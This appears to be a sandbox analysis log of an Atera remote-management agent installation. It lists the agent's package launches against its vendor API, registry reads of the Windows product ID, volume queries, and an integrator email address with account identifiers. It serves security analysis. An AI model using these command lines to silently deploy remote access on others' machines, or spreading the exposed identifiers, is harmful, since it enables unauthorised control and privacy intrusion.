                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "c:\program files (x86)\atera networks\ateraagent\ateraagent.exe" /i /integratorlogin="barrostransportes2018@gmail.com" /companyid="1" /integratorloginui="" /companyidui="" /folderid="" /accountid="001q300000mhga9iap" /agentid="3757c761-9e50-4f15-8086-0e584dceea48"
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "c0a02000-d8db-4c72-a990-e7e78fb2c44b" agent-api.atera.com/production 443 or8ixli90mf "minimalidentification" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "08ea1206-2fa8-46b2-a7c8-5fb30d3b6805" agent-api.atera.com/production 443 or8ixli90mf "minimalidentification" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "7cd28163-b1ef-497f-b073-8581f0695073" agent-api.atera.com/production 443 or8ixli90mf "identified" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "cc07350c-f483-47f0-a322-e5655b4447fa" agent-api.atera.com/production 443 or8ixli90mf "generalinfo fromgui" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackagestremote\agentpackagestremote.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "463fd9d0-b270-46be-8e66-442f10d730f6" agent-api.atera.com/production 443 or8ixli90mf "install eyjsbw1db2rlijoiafpdrezqaes3nw1kin0=" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackagemonitoring\agentpackagemonitoring.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "8a9134ff-5e44-480a-9a18-d667aeeec188" agent-api.atera.com/production 443 or8ixli90mf "syncprofile" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "5fd723dc-67af-48d2-add5-cb21dbd46c10" agent-api.atera.com/production 443 or8ixli90mf "generalinfo" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageupgradeagent\agentpackageupgradeagent.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "d4d269d4-e88c-4b28-b73e-8aa8339ce0f7" agent-api.atera.com/production 443 or8ixli90mf "checkforupdates" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageticketing\agentpackageticketing.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "10a783e3-c632-4a9e-aced-d9359a7beffe" agent-api.atera.com/production 443 or8ixli90mf "maintain" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageprogrammanagement\agentpackageprogrammanagement.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "83c4b87a-e204-4da6-bcee-e7b8e82431d2" agent-api.atera.com/production 443 or8ixli90mf "syncinstalledapps" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageinternalpoller\agentpackageinternalpoller.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "66f79428-b794-442f-982d-2e0a02b56009" agent-api.atera.com/production 443 or8ixli90mf "pollall" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackagemarketplace\agentpackagemarketplace.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "487fa34b-77da-4f1b-8f72-efcd0c681b03" agent-api.atera.com/production 443 or8ixli90mf "agentprovision" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackagemonitoring\agentpackagemonitoring.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "536561ff-dfee-40bc-945b-5b9b9c53fde8" agent-api.atera.com/production 443 or8ixli90mf "monitor" 001q300000mhga9iap
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "c:\program files (x86)\atera networks\ateraagent\ateraagent.exe" /i /integratorlogin="barrostransportes2018@gmail.com" /companyid="1" /integratorloginui="" /companyidui="" /folderid="" /accountid="001q300000mhga9iap" /agentid="3757c761-9e50-4f15-8086-0e584dceea48"Jump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "c0a02000-d8db-4c72-a990-e7e78fb2c44b" agent-api.atera.com/production 443 or8ixli90mf "minimalidentification" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "08ea1206-2fa8-46b2-a7c8-5fb30d3b6805" agent-api.atera.com/production 443 or8ixli90mf "minimalidentification" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "7cd28163-b1ef-497f-b073-8581f0695073" agent-api.atera.com/production 443 or8ixli90mf "identified" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "cc07350c-f483-47f0-a322-e5655b4447fa" agent-api.atera.com/production 443 or8ixli90mf "generalinfo fromgui" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackagestremote\agentpackagestremote.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "463fd9d0-b270-46be-8e66-442f10d730f6" agent-api.atera.com/production 443 or8ixli90mf "install eyjsbw1db2rlijoiafpdrezqaes3nw1kin0=" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "5fd723dc-67af-48d2-add5-cb21dbd46c10" agent-api.atera.com/production 443 or8ixli90mf "generalinfo" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageupgradeagent\agentpackageupgradeagent.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "d4d269d4-e88c-4b28-b73e-8aa8339ce0f7" agent-api.atera.com/production 443 or8ixli90mf "checkforupdates" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageticketing\agentpackageticketing.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "10a783e3-c632-4a9e-aced-d9359a7beffe" agent-api.atera.com/production 443 or8ixli90mf "maintain" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageprogrammanagement\agentpackageprogrammanagement.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "83c4b87a-e204-4da6-bcee-e7b8e82431d2" agent-api.atera.com/production 443 or8ixli90mf "syncinstalledapps" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageinternalpoller\agentpackageinternalpoller.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "66f79428-b794-442f-982d-2e0a02b56009" agent-api.atera.com/production 443 or8ixli90mf "pollall" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackagemarketplace\agentpackagemarketplace.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "487fa34b-77da-4f1b-8f72-efcd0c681b03" agent-api.atera.com/production 443 or8ixli90mf "agentprovision" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EB739C cpuid 37_2_00007FFB02EB739C
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe VolumeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI9B15.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI9B15.tmp-\AlphaControlAgentInstallation.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSIA259.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSIA259.tmp-\AlphaControlAgentInstallation.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSIA259.tmp-\Newtonsoft.Json.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSIB4E8.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSIB4E8.tmp-\AlphaControlAgentInstallation.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSID8C1.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSID8C1.tmp-\AlphaControlAgentInstallation.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSID8C1.tmp-\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\StructureMap.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\OpenHardwareMonitorLib.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Polly.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Threading.Tasks\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Threading.Tasks.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\NLog.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Collections\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Collections.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Linq\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Linq.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ValueTuple\v4.0_4.0.0.0__cc7b13ffcd2ddd51\System.ValueTuple.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Data.SQLite.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Dapper.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
